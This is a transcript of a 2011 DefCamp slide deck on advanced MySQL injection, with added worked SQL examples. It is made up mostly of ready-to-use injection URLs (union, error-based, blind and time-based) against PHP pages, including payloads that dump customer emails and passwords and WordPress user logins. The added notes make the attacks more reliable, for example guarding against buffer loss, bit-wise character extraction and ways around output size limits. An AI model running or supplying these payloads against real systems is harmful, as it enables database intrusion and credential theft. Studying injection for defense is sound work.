Page 1: Advanced data mining in my sql injections using subqueries and custom variables

“Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables”

DEFCAMP – 2011

Page 2: Advanced data mining in my sql injections using subqueries and custom variables

Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________

- CONTENTS -

[ * ] Introductory notions: SQL, SQL injection

[ * ] Custom (user-defined) variables and subqueries in MySQL

[ * ] Optimising the classic information-extraction techniques:
 - MySQL variables (Server System Variables / Session Variables)
 - available databases (schema_name / SCHEMATA)
 - tables and their columns (table_name / column_name)
 - privileges (USER_PRIVILEGES: GRANTEE / PRIVILEGE_TYPE / IS_GRANTABLE)
 - reading & writing files (LOAD_FILE / INTO DUMPFILE - OUTFILE)
 - Denial of Service (DoS) attacks

Page 3: Advanced data mining in my sql injections using subqueries and custom variables


Structured Query Language (SQL) is the standard language for manipulating and retrieving data in relational databases. Through SQL a programmer or a database administrator can:

* modify the structure of a database;
* change the configuration values for system security;
* grant users rights over databases or tables;
* query a database for information;
* update the contents of a database.

Page 4: Advanced data mining in my sql injections using subqueries and custom variables


How do PHP + MySQL work?

< the request made by the client

< the request is processed on the server side

< the response sent back to the client as the result of the request

Page 5: Advanced data mining in my sql injections using subqueries and custom variables


What could possibly go wrong ?

!!!!!!

Page 6: Advanced data mining in my sql injections using subqueries and custom variables


SQL injection is the technique of malforming the SQL syntax of a query by altering the values of the $_GET, $_POST, cookie and header parameters that the server-side files take and process without first filtering characters or commands that can be dangerous (the query is built by string concatenation, which is exactly what parameterised queries avoid).

Page 7: Advanced data mining in my sql injections using subqueries and custom variables


Example of a classic MySQL injection.

Page 8: Advanced data mining in my sql injections using subqueries and custom variables


index.php?id=-1+UNION+SELECT+1,convert(@@version using latin1),3,4,5--

Types of SQL injection: UNION BASED

index.php?id=1' and 2=4 UNION SELECT 1,2,3,4,5,6,7,8,9,10 --

index.php?poze=vedete"+and+false+union+all+select+1,2,version(),4,5,6+and+"1"="1

index.php?id=-1/*!AND*/1=1+UNiOn+ALl+SelECt+1,/**/2,/**/3,/**/4/**/limit/**/1,2

index.php?id=1+and+1=0+union+select+sql_no_cache+1,2,3,4,5

Page 9: Advanced data mining in my sql injections using subqueries and custom variables


Types of SQL injection: UNION BASED

Page 10: Advanced data mining in my sql injections using subqueries and custom variables


Types of SQL injection: ERROR BASED

index.php?id=(@:=1)||@+group+by+concat(@@version,!@)having@||min(@:=0)--+

index.php?id=53+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID((select+concat_ws(0x3a,version(),database(),user())),1,63),+FLOOR(RAND(0)*2)))+--+

news.php?id=589'+or+1+group+by+concat((select+version()),floor(rand(0)*2))+having+min(0)+or+1--+

details.php?ID=9 or (select count(*) from mysql.user group by concat(version(),floor(rand(0)*2)))--

?productid=1124+and+row(1,2)in(select+count(*),concat((select+table_name+from+information_schema.tables+limit+3,1),0x3a,floor(rand(0)*2))as+a+from+information_schema.tables+x+group+by+a)--
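Every FLOOR(RAND(0)*2) payload on this slide relies on one MySQL quirk. The statements below are an added example, not part of the original slides: they reproduce the quirk on a constructed derived table so that the one hard requirement (at least three source rows) is visible. The key name quoted in the error message differs between MySQL versions.

```sql
-- Added example, not code from the original slides. Row sources are constructed.

-- 1. RAND(0) is seeded, so its sequence is fixed on every run. The first
--    values of FLOOR(RAND(0)*2) are 0, 1, 1, 0, 1, 1, ...
SELECT FLOOR(RAND(0)*2) AS v
FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3 UNION SELECT 4) t;

-- 2. GROUP BY on such an expression fills a temporary table keyed on the
--    group value. For each row MySQL evaluates the key once to look it up
--    and, when it is absent, evaluates it AGAIN to insert it. With the
--    seeded sequence that second evaluation eventually produces a key that
--    is already present, and the insert fails with a duplicate-key error
--    whose message contains the key, i.e. the data we concatenated into it.
SELECT COUNT(*), CONCAT(@@version, ':', FLOOR(RAND(0)*2)) AS k
FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3) x
GROUP BY k;

-- 3. The same query over two rows does not collide and returns normally;
--    this is why the payloads above union three constants or select from
--    a table that is known to be big (information_schema.tables, mysql.user).
SELECT COUNT(*), CONCAT(@@version, ':', FLOOR(RAND(0)*2)) AS k
FROM (SELECT 1 UNION SELECT 2) x
GROUP BY k;
```

Statement 1 returns 0, 1, 1, 0. Statement 2 fails with ERROR 1062 (23000): Duplicate entry '<server version>:1' for key 'group_key' (MySQL 8 prints the key as '<group_key>'). Statement 3 returns two rows and no error. Walking the sequence explains the three-row minimum: row 1 looks up key 0, misses, and inserts key 1; row 2 looks up key 1 and hits; row 3 looks up key 0, misses, and tries to insert key 1 again, which is the collision. The group key is limited in length, which is why the second payload above cuts the concatenated string with MID(..., 1, 63).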

Page 11: Advanced data mining in my sql injections using subqueries and custom variables


Types of SQL injection: ERROR BASED

Page 12: Advanced data mining in my sql injections using subqueries and custom variables


Types of SQL injection: BLIND

index.php?id=1' and substring(@@version,1,1)=4--

index.php?id=1' and substring(@@version,1,1)=5--

index.php?id=1 and (SELECT 1 from admin limit 0,1)=1

news.php?id=-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=100,1,SLEEP(3))

index.html?mdl=5020+and+ascii(lower(substring((select+table_name+from+information_schema.tables+limit+17,1),1,1)))>1

index.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>103

script.php?par=1 and IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=100,1,BENCHMARK(2000000,MD5(NOW()))) --

script.php?par=1 and IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=100,1,SLEEP(3)) --
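Before scripting the boolean and time-based probes above, two things are worth checking on the target. The queries below are an added example, not from the slides, run against a constructed users table; the table, its collation and the stored value are assumptions made for the demonstration.

```sql
-- Added example, not code from the original slides. Table and rows are constructed.
CREATE TEMPORARY TABLE users (username VARCHAR(32), password VARCHAR(64))
  CHARACTER SET utf8mb4 COLLATE utf8mb4_general_ci;
INSERT INTO users VALUES ('admin', 'S3cret!');

-- Check 1: string equality is collation-aware. Under a *_ci collation 'S' = 's',
-- so a guess built from substring(...)='s' accepts the wrong case and the
-- recovered value (a hash, a salt, a token) is silently wrong. Compare the
-- numeric code with ASCII()/ORD(), as most payloads above do, or force a
-- byte-wise comparison with BINARY.
SELECT SUBSTRING(password, 1, 1) = 's'        AS ci_match,
       BINARY SUBSTRING(password, 1, 1) = 's' AS bin_match,
       ASCII(SUBSTRING(password, 1, 1)) = 83  AS ascii_match
FROM users WHERE username = 'admin';

-- Check 2: the ">=100" probe is a binary search over the code, about 7
-- requests per 7-bit character. Asking for one bit per request costs the
-- same 7 requests, but each answer is a fixed bit of the result: simpler to
-- script, and a lost or mis-timed response only costs one re-asked bit
-- instead of a restarted search.
SELECT (ASCII(SUBSTRING(password, 1, 1)) >> 6) & 1 AS b6,
       (ASCII(SUBSTRING(password, 1, 1)) >> 5) & 1 AS b5,
       (ASCII(SUBSTRING(password, 1, 1)) >> 4) & 1 AS b4,
       (ASCII(SUBSTRING(password, 1, 1)) >> 3) & 1 AS b3,
       (ASCII(SUBSTRING(password, 1, 1)) >> 2) & 1 AS b2,
       (ASCII(SUBSTRING(password, 1, 1)) >> 1) & 1 AS b1,
       (ASCII(SUBSTRING(password, 1, 1)) >> 0) & 1 AS b0
FROM users WHERE username = 'admin';

-- Injected, bit 6 of the first byte becomes the boolean condition, e.g.
--   index.php?id=1 and (ascii(substring((select password from users where username='admin'),1,1))>>6)&1
```

The first SELECT returns 1, 0, 1: the case-insensitive match accepts 's' for 'S', the BINARY comparison rejects it, and the ASCII comparison is exact (83 is 'S'). The second returns 1 0 1 0 0 1 1, which is 0x53, again 'S'. Both checks are cheap to run once up front and save a full re-extraction later.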

Page 13: Advanced data mining in my sql injections using subqueries and custom variables


Types of SQL injection: BLIND

Page 14: Advanced data mining in my sql injections using subqueries and custom variables


MySQL Custom Variables (user-defined variables)

Page 15: Advanced data mining in my sql injections using subqueries and custom variables


MySQL Sub-Queries (subqueries)

SELECT * FROM t1 WHERE column1 = (SELECT column1 FROM t2);

Page 16: Advanced data mining in my sql injections using subqueries and custom variables


MySQL injections using custom variables:

CLASSIC SYNTAX: index.php?id=2'+and+1=0+union+select+1,2,3,4,5--

NEW SYNTAX: index.php?id=2'+and+1=0+union+select+@i:=version(),@i,@i,@i,@i--

@i:=concat( version(),0x3a,database() )

@i:=cast(version()+as+binary)

@i:=convert(version(),binary)

@i:=convert(version()+using+latin1)

@i:=aes_decrypt(aes_encrypt(version(),1),1)

@x:=concat(0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name)

The value is computed once, in the first column, and the variable is reused to fill the remaining UNION columns; the cast/convert/aes_decrypt variants are the usual workarounds for "Illegal mix of collations" errors when the charset of the injected column does not match the original one.

Page 17: Advanced data mining in my sql injections using subqueries and custom variables


MySQL injections using subqueries:

index.php?id=-1+union+select+*+from+users,(select+1,2,3,4,5,6)a--

id=3 AND (SELECT 7574 FROM(SELECT COUNT(*) ,CONCAT(CHAR(58,103,104,115,58),(SELECT (CASE WHEN (7574=7574) THEN 1 ELSE 0 END)), CHAR(58,101,118,118,58), FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

index.php?id=-1+union+(select 1,2,3,4,5 where 1=2 order by 1) UNION (select 1,2,3,4,5)--+--X

Page 18: Advanced data mining in my sql injections using subqueries and custom variables


MySQL injections using subqueries + custom variables:

index.php?id=-4 union select 1,2,(select(@x) from(select(@x:=0x00) , (select (null) from (information_schema.columns) where (table_schema!='information_schema') and (0x00) in (@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4--
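The payload above is the point where the custom-variable slide and the subquery slide meet: a user-defined variable is reset inside one subquery and then grown, one row at a time, as a side effect of the WHERE clause of another. The query below is an added example, not code from the slides; it runs the same construction against a constructed customers table so the three steps are visible, and assumes MySQL 5.x as the slides do (assigning user variables inside expressions is deprecated from MySQL 8.0.13, and the evaluation order is documented as undefined there). The hex literals in the payload are plain text: 0x3c62723e is "<br>", 0x2e is ".", 0x3a is ":", and 0x0d0a used here is CRLF.

```sql
-- Added example, not code from the original slides. Table and rows are constructed.
CREATE TEMPORARY TABLE customers (id INT, mail VARCHAR(64), password VARCHAR(64));
INSERT INTO customers VALUES (1, 'a@x.tld', 'h1'), (2, 'b@x.tld', 'h2'), (3, 'c@x.tld', 'h3');

SELECT (SELECT @x) AS dump_
FROM (
  -- 1. The select list of the derived table is evaluated left to right,
  --    so @x is reset before the scan in the second expression starts.
  SELECT (@x := ''),
  -- 2. The scalar subquery walks every row of customers. Its WHERE clause
  --    runs once per row; the assignment inside it is the side effect we
  --    want, and the comparison 0x00 IN ('<long string>') is always false,
  --    so the subquery returns no row (NULL) and can never raise
  --    "Subquery returns more than 1 row".
         (SELECT NULL
            FROM customers
           WHERE (0x00) IN (@x := CONCAT(@x, 0x0d0a, mail, 0x3a, password)))
) x;
-- 3. The outer SELECT reads @x only after the derived table x has been
--    materialised, i.e. after the whole scan has finished.
```

dump_ comes back as a CRLF-separated list, a@x.tld:h1, b@x.tld:h2, c@x.tld:h3, in scan order (not sorted), with a leading CRLF because the accumulator starts empty. Substituting information_schema.columns and the slide's table_schema/table_name/column_name triple gives the full schema listing in a single UNION column. The reason for this construction instead of GROUP_CONCAT() is size: GROUP_CONCAT() output is cut at group_concat_max_len (1024 bytes by default), while a user variable is only bounded by max_allowed_packet.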

index.php?id=-1 Union select 1,2, concat(@i:=0x00,@o:=0x0d0a, benchmark(150, @o:=CONCAT(@o,0x0d0a,(SELECT+concat(@i:=mail,0x3a,password)+from+customers+WHERE+mail > @i+order+by+mail+LIMIT+1+))),@o),4

index.php?id=-7' union (select * from (select @i:=version())q join (select @i)w join (select @i)e join (select @i)r join (select @i)t join (select @i)y join (select @i)u join (select @i)i join (select @i)o)--+--qwertyxxxxxxxx

Page 19: Advanced data mining in my sql injections using subqueries and custom variables


MySQL injections using subqueries + custom variables:

index.php?id=2'+and+1=0+union+select+1,2,3,4,concat(@i:=0x00,@o:=0xd0a,benchmark(1010370,@o:=CONCAT(@o,0xd0a,(SELECT+concat(0x3c62723e,@i:=user_login)+FROM+wp_users+WHERE+user_login>@i+order+by+user_login+LIMIT+1))),@o),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables--
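The two BENCHMARK() payloads (this slide and the customers one on the previous slide) use a different loop from the WHERE-clause accumulator: a scalar subquery is re-run N times, @i is a cursor that the subquery itself advances, and @o is the output buffer. The query below is an added example, not from the slides, that runs the same loop on a constructed table and handles the failure mode of the original form: once the cursor has passed the last row the subquery returns NULL, CONCAT() of a NULL argument is NULL, and the buffer is wiped, so the slide's iteration count has to match the row count exactly. IFNULL() removes that constraint. The table, its rows and the iteration count are assumptions; MySQL 5.x is assumed, as in the slides.

```sql
-- Added example, not code from the original slides. Table and rows are constructed
-- (inserted out of order on purpose: the cursor walks them sorted by mail).
CREATE TEMPORARY TABLE customers (mail VARCHAR(64), password VARCHAR(64));
INSERT INTO customers VALUES ('c@x.tld', 'h3'), ('a@x.tld', 'h1'), ('b@x.tld', 'h2');

SELECT CONCAT(
         -- @i is the cursor (last mail fetched); '' sorts before any real mail.
         @i := '',
         -- @o is the output buffer.
         @o := '',
         -- BENCHMARK() evaluates its second argument N times. The scalar
         -- subquery reads user variables, which makes it uncacheable, so it
         -- really is re-run on each iteration: fetch the first mail after the
         -- cursor, advance the cursor (@i := mail), append mail:password to @o.
         BENCHMARK(1000,
           @o := CONCAT(@o,
                        -- After the last row the subquery returns NULL; without
                        -- IFNULL() that would turn @o into NULL for every
                        -- remaining iteration and the whole dump would be lost.
                        IFNULL((SELECT CONCAT(@i := mail, 0x3a, password, 0x0d0a)
                                  FROM customers
                                 WHERE mail > @i
                                 ORDER BY mail
                                 LIMIT 1), ''))),
         @o) AS dump_;
```

dump_ comes back as 0a@x.tld:h1 CRLF b@x.tld:h2 CRLF c@x.tld:h3 CRLF: sorted by mail, with a leading 0 that is BENCHMARK()'s return value picked up by the outer CONCAT(), exactly as in the original payloads. 1000 iterations is far more than the three rows; with the guard in place the surplus iterations just re-run a subquery that returns nothing, so a generous count is safe where the slide's 150 had to be exact. On a real table each iteration is an ORDER BY ... LIMIT 1 over the rows after the cursor, so an index on the cursor column makes the difference between seconds and a request timeout. MySQL documents the evaluation order of user-variable assignments within one statement as undefined and deprecates the syntax from 8.0.13, which makes this, like the accumulator, a 5.x-era technique.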

Page 20: Advanced data mining in my sql injections using subqueries and custom variables

………